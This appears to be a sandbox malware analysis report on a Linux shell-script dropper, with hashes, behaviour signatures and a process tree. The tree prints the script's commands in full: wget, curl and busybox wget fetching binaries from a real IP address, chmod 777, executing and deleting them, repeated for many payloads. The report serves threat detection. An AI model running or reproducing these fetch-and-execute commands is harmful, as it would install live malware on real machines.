Analysis
-
max time kernel
63s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1543 chmod 1611 chmod 1653 chmod 1495 chmod 1555 chmod 1573 chmod 1623 chmod 1593 chmod 1599 chmod 1659 chmod 1501 chmod 1525 chmod 1549 chmod 1579 chmod 1531 chmod 1617 chmod 1635 chmod 1519 chmod 1605 chmod 1629 chmod 1647 chmod 1513 chmod 1537 chmod 1587 chmod 1641 chmod 1507 chmod 1561 chmod 1567 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 1496 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 1502 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 1508 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 1514 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 1520 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 1526 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 1532 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 1538 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 1544 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 1550 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 1556 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 1562 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 1568 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 1574 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 1580 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 1588 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 1594 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 1600 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 1606 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 1612 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 1618 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 1624 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 1630 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 1636 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 1642 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 1648 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 1654 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 1660 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:1487
-
/bin/rm/bin/rm bins.sh2⤵PID:1488
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1489
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1494
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:1496
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1497
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1498
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Writes file to tmp directory
PID:1499
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1500
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:1501
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:1502
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1503
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1504
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1506
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1512
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Writes file to tmp directory
PID:1517
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1518
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1524
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1530
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1536
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1542
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1548
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1554
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1560
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1566
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1572
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1578
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1586
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1592
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1598
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1604
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1610
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:1611
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:1612
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:1613
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1614
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Writes file to tmp directory
PID:1615
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1616
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:1617
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:1618
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:1619
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1620
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Writes file to tmp directory
PID:1621
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1622
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:1623
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:1624
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:1625
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:1626
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Writes file to tmp directory
PID:1627
-
-
